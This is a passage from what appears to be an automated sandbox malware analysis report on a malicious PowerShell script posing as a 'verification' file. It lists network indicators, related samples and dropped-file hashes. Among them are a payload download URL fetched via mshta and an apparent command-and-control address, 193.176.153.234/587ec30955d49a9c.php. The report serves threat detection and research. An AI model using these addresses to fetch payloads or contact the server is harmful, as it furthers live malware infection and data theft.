                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1C:mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369176557.0000022F67070000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.234/587ec30955d49a9c.phpDBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1Dmshta.exe, 00000003.00000002.2369176557.0000022F67077000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1I9mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.ver)svchost.exe, 00000004.00000002.2966543724.00000209D8600000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/ProdV2.C:edb.log.4.drfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore6powershell.exe, 00000000.00000002.1728419864.000001E7E1683000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1...r#mshta.exe, 00000003.00000003.2366620634.0000023769CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2370751127.0000023769CA5000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1_BROWSER_APP_Bmshta.exe, 00000003.00000002.2369835096.0000022F67400000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1Umshta.exe, 00000003.00000002.2371901544.000002376E1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1entVmshta.exe, 00000003.00000002.2369176557.0000022F67098000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1c9xmshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.234/587ec30955d49a9c.php/BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1(imshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/Prod.C:edb.log.4.drfalse
                • URL Reputation: safe
                		unknown
                https://protobuf.dev/reference/go/faq#namespace-conflictduration0SmartAssem.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1https://bidvertiser.b-cdn.net/smart1mshta.exe, 00000003.00000003.2365006534.000002376D0B5000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.234/587ec30955d49a9c.phplBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1mmshta.exe, 00000003.00000002.2369326741.0000022F670E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/ProdV2edb.log.4.drfalse
                • URL Reputation: safe
                		unknown
                https://bidvertiser.b-cdn.net/h#mshta.exe, 00000003.00000003.2358841397.0000022F6711B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369402329.0000022F6711B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.234/587ec30955d49a9c.php0BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.2348:BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                • URL Reputation: safe
                		unknown
                http://193.176.153.234BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmptrue
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1...mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://bidvertiser.b-cdn.net/smart1:asLMEMPxmshta.exe, 00000003.00000002.2371500355.000002376BE90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366801672.000002376BE8D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.234/XBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.virtualbox.org/VBoxVMM.dll.5.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1728419864.000001E7E169E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA6AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1922955102.000001EC259C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1OOC:mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1728419864.000001E7E16CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1922955102.000001EC259C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart10mshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                • URL Reputation: safe
                		unknown
                http://193.176.153.234;BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://193.176.153.234/587ec30955d49a9c.phpxBitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                193.176.153.234
                		unknownunknown
                		207451AGROSVITUAtrue
                185.93.1.250
                		bidvertiser.b-cdn.netCzech Republic
                		60068CDN77GBtrue

                Private

                IP
                127.0.0.1

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1491044
                Start date and time:2024-08-10 19:09:04 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:verification.b-cdn.net.ps1
                Detection:MAL
                Classification:mal100.troj.evad.winPS1@14/24@1/3
                EGA Information:
                • Successful, ratio: 20%
                HCA Information:
                • Successful, ratio: 72%
                • Number of executed functions: 20
                • Number of non-executed functions: 18
                Cookbook Comments:
                • Found application associated with file extension: .ps1

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target 0SmartAssem.exe, PID 7716 because there are no executed function
                • Execution Graph export aborted for target mshta.exe, PID 7172 because there are no executed function
                • Execution Graph export aborted for target powershell.exe, PID 4108 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 7100 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                13:10:01API Interceptor2x Sleep call for process: svchost.exe modified
                13:10:03API Interceptor1x Sleep call for process: mshta.exe modified
                13:10:03API Interceptor42x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.93.1.250SecuriteInfo.com.not-a-virus.HEUR.Server-Proxy.MSIL.Agentb.gen.14618.27578.exeGet hashmaliciousUnknownBrowse
                  http://www.madrasaenajah.com/lob-yhIe~Mf/C/Get hashmaliciousPhisherBrowse
                    https://file.io/DEhOHv7umoCjGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.not-a-virus.HEUR.Server-Proxy.MSIL.Luminati.gen.21829.28282.exeGet hashmaliciousUnknownBrowse
                        https://kangbinkwon.github.io/kangbinkwon-Netflix_clonecoding/Get hashmaliciousUnknownBrowse
                          https://llink.to/?u=https://www.theschooloflife.com/about-us/privacy-policy/&e=960e1a6fe5dc4bd580794d1cca87f46cGet hashmaliciousUnknownBrowse
                            https://sports.zaly.online/57724/Get hashmaliciousUnknownBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CDN77GBhttp://bqrsy.seekinvest.co/4xnSRn15308idbK1376jqowxkjgss14745HXOATNJZKAZVKSP98PXJV17762C16#8gfe0i2lkfqxzo4xifhbmdsxykiibapo1vlzxy35431iw10ly9Get hashmaliciousUnknownBrowse
                              • 195.181.170.18
                              http://clone-netflix.netlify.app/Get hashmaliciousUnknownBrowse
                              • 89.187.169.47
                              verify-captcha-987.b-cdn.net.ps1Get hashmaliciousClipboard HijackerBrowse
                              • 89.187.169.39
                              verifyhuman476.b-cdn.net.ps1Get hashmaliciousClipboard HijackerBrowse
                              • 89.187.169.47
                              https://events.csiro.au/sitecore/RedirectUrlPage.aspx?ec_contact_id=1DA68C6AF536E76F6A42373E99CB368C&ec_message_id=7AB222E9302B4AB8A943E9FD7AAE1DF3&ec_url=https://hr.economictimes.indiatimes.com/etl.php?url=electraconsultants.com/redirecting?maddie.capes@msdmining.com.auGet hashmaliciousHTMLPhisherBrowse
                              • 212.102.56.178
                              http://cloudflare-ipfs.com/ipfs/bafkreifpoyvrphoiovn7hewptqfnvnciosy5ynzqpghzcad46hweedcphaGet hashmaliciousHTMLPhisherBrowse
                              • 185.93.3.244
                              https://ipfs.io/ipfs/bafkreifpoyvrphoiovn7hewptqfnvnciosy5ynzqpghzcad46hweedcphaGet hashmaliciousHTMLPhisherBrowse
                              • 185.93.3.244
                              https://ipfs.io/ipfs/bafkreigdmr3dab6hifnupc5d7wrdkfq7d2gjgmuhewowmlyufosov6ufgeGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                              • 185.93.3.244
                              https://ipfs.io/ipfs/bafkreifgljb5374su6q4pksdcbdzdpzx225u5zz2gtdbfcr2ltwedn5t5iGet hashmaliciousHTMLPhisherBrowse
                              • 185.93.3.244
                              https://ipfs.io/ipfs/bafkreidlod2sf2qbeojthpzmf5gwqoobb7cnvdzcjrrzlcamwvyml57gry#electronics@victrex.comGet hashmaliciousUnknownBrowse
                              • 185.93.3.244
                              AGROSVITUAhttps://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0Get hashmaliciousPhisherBrowse
                              • 185.66.88.175
                              https://sdfsd.s3.bhs.cloud.ovh.net/v1/AUTH_8749f4abd4b14c57a9f85d6e4378c063/dsfdf/gfhfgh#cl/298587_smd/265/3571761/3180/201/26638Get hashmaliciousPhisherBrowse
                              • 185.66.88.174
                              3Ja0hSOMSI.exeGet hashmaliciousAmadeyBrowse
                              • 193.176.158.193
                              https://click.pstmrk.it/3s/bfsdqbhdfqsbhdf.blogspot.com%2F/lvid/EsqzAQ/AQ/3d6bdb2c-8ba6-4238-a213-e9cee32f03d6/2/EhSnAlFZDV#cl/210168_smd/274/3553163/3122/3317/328533Get hashmaliciousUnknownBrowse
                              • 185.66.89.110
                              etk0z46vrL.exeGet hashmaliciousStealc, VidarBrowse
                              • 194.120.116.120
                              http://environnement.mooo.comGet hashmaliciousUnknownBrowse
                              • 193.176.158.199
                              https://neon.ly/c2df7a96-7e7b-434f-8fbd-e7d0667e7df5#cl/4534_md/1110/5173/689/14/544786Get hashmaliciousPhisherBrowse
                              • 193.176.190.137
                              #U041d#U0430#U043a#U043b#U0430#U0434#U043d#U0430#U044f_#U211614-1839-7112.exeGet hashmaliciousDarkWatchmanBrowse
                              • 193.176.158.127
                              #U0410#U043a#U0442_#U0441#U0432#U0435#U0440#U043a#U0438_#U2116534-23_#U043e#U0442_29.09.2023.exeGet hashmaliciousDarkWatchmanBrowse
                              • 193.176.158.127
                              Nuovo pagamento.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.66.88.198

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exeGet hashmaliciousUnknownBrowse
                              • 185.93.1.250
                              SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exeGet hashmaliciousUnknownBrowse
                              • 185.93.1.250
                              SolaraBootstrapper.exeGet hashmaliciousUnknownBrowse
                              • 185.93.1.250
                              ExReporterFIX.exeGet hashmaliciousXWormBrowse
                              • 185.93.1.250
                              SecuriteInfo.com.BackDoor.AgentTeslaNET.12.6450.17799.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 185.93.1.250
                              IMPORT PO2024-0961 ASTG.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                              • 185.93.1.250
                              devil.vbeGet hashmaliciousAgentTeslaBrowse
                              • 185.93.1.250
                              ndGmwWXGOn.htaGet hashmaliciousCobalt Strike, GuLoader, RemcosBrowse
                              • 185.93.1.250
                              QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 185.93.1.250
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 185.93.1.250
                              37f463bf4616ecd445d4a1937da06e19284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                              • 185.93.1.250
                              FBS2024000000392.docx.docGet hashmaliciousUnknownBrowse
                              • 185.93.1.250
                              ndGmwWXGOn.htaGet hashmaliciousCobalt Strike, GuLoader, RemcosBrowse
                              • 185.93.1.250
                              file.exeGet hashmaliciousAmadey, SystemBCBrowse
                              • 185.93.1.250
                              file.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                              • 185.93.1.250
                              sahost.exeGet hashmaliciousGuLoaderBrowse
                              • 185.93.1.250
                              IEexplore.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                              • 185.93.1.250
                              SecuriteInfo.com.Win32.MalwareX-gen.27910.19137.exeGet hashmaliciousUnknownBrowse
                              • 185.93.1.250
                              SecuriteInfo.com.Win32.MalwareX-gen.27910.19137.exeGet hashmaliciousUnknownBrowse
                              • 185.93.1.250
                              file.exeGet hashmaliciousVidarBrowse
                              • 185.93.1.250

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):1.3073508452922409
                              Encrypted:false
                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
                              MD5:14CEA15C79CCB7BBDB86ACE5814A0C80
                              SHA1:53073B1A2D8A28AA7B443CC63AD3465308A8120E
                              SHA-256:14B2FF087733B3AEE35CCAB7A2D2B4E593C41D31AC14265E656B524CC0A9E807
                              SHA-512:E680032AF8C6CAD1F1DDE1E15DB6BBD01F136062A181CB6487934BF9003BC169DC8975CD07BF7D70AAD5003E9BA1E319DD494C81825B7E3550DD11DD3B26A9E9
                              Malicious:false
                              Reputation:low
                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3e63031f, page size 16384, DirtyShutdown, Windows version 10.0
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.42213050659793255
                              Encrypted:false
                              SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                              MD5:2F0E30157F4EE7EE6015799EB8C46DE1
                              SHA1:8AB06DB6AC4611FB15492A0B0AB5B7605D080FF0
                              SHA-256:BAA6E84FC046F1EF49B0A51F4E2C2C34D74CD055F4CD1601854039FE9B675A71
                              SHA-512:24524DA59B7F69CA3F3FABB2D5747575DD50DBE3D0C6468A2F860DF2F67FEC9EE029DAEFA48AA8FCC2C8A26C1721D0C47893C04954235EA4CD3A8283AB10CB9F
                              Malicious:false
                              Reputation:low
                              Preview:>c..... .......A.......X\...;...{......................0.!..........{A......|k.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................$.p.....|k....................z.....|k..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.0764421126838834
                              Encrypted:false
                              SSDEEP:3:ZYeTAxjn13a/Qs1i1ollcVO/lnlZMxZNQl:ZzTAx53qtOewk
                              MD5:78AD9E1A5EB1270AD5124127BE2AE718
                              SHA1:CF4DB485A160B601AFAA37BA9DC270E1EE2B44C0
                              SHA-256:EA988054D76E1B3E3416033ED529D135DA380D68146246C22DB216323CB6C86B
                              SHA-512:541D8AC240003AFBCED101164D6ECD046462889D32125C318C3A35C061E6B5F7B1B2A6FBBCB13130EAE3FF245F79EA163BA8C64C397C52F90CD54E400CE585BE
                              Malicious:false
                              Reputation:low
                              Preview:..?x.....................................;...{.......|k......{A..............{A......{A..........{A]...................z.....|k.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]

                              Download File
                              Process:C:\Windows\System32\mshta.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):166102
                              Entropy (8bit):6.058603966920187
                              Encrypted:false
                              SSDEEP:3072:088nbom5xIAb88nbom5xIAwBo88nbom5xIAX88nbom5xIA:ByxH6yxHgyxHOyxH
                              MD5:D1FE96463BB2DB299645B3C39176D006
                              SHA1:D6A2C8367815CC28A5C16C7953AAB1CE91AA1764
                              SHA-256:760B5E6A856D503C20D46F910A2405F51944AFEF16479EBC0174EB213C2C0132
                              SHA-512:A8BA1F4EB87C4D27FC7F4C7D14D1A1FCF51B8C8155DEC4D961659D519BF21CBA4A8873D002EB482E962B5E1E9BAD46344B31480EB593D5CB7809E88EB1E1461E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 39%
                              • Antivirus: Virustotal, Detection: 28%, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WV...7p..7p..7p..Eu..7p..Es..7p..Et..7p..Eq..7p..7q..7p..Ex..7p..E...7p..Er..7p.Rich.7p.................PE..L...G....................R...8.......X.......p....@.................................."....@...... .......................... ...........................................T............................................................................text....Q.......R.................. ..`.data........p.......V..............@....idata...............X..............@..@.rsrc................f..............@..@.reloc...............x..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1472
                              Entropy (8bit):5.2923509440931396
                              Encrypted:false
                              SSDEEP:24:3NISKco4KmM6GjKbm51s4RPTu1oGoUP7m9qr9t7J0gt/NKmNUNlr8Hv9ILAle:GSU4YymI4RCaGoUP7m9qr9tK8NfUNl4G
                              MD5:C980FB559BEDEEAC21332966C8495031
                              SHA1:6B117442E20BA2666243110EEC882CC7F7BECA7D
                              SHA-256:A1B4FA49055EC744BC911CF00C1D0C56679FA38601D95269404A610C26DBC969
                              SHA-512:F68C206376A9E056D1C38CC0AE2DCFB89F85302A4AF2A151A15353C94CE06C151F981EB22C65A0B61AAB8D14412354A784D352E0EDC825C70E4D31E8F04E1BFC
                              Malicious:false
                              Preview:@...e...........+...............................................@...............|.jdY\.H.s9.!..|).......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................0..~.J.R...L........System.Data.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0il2ydi0.us5.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0imofb0y.tcb.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3501zbvn.dry.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aa03krre.ova.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ad3omf24.llk.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
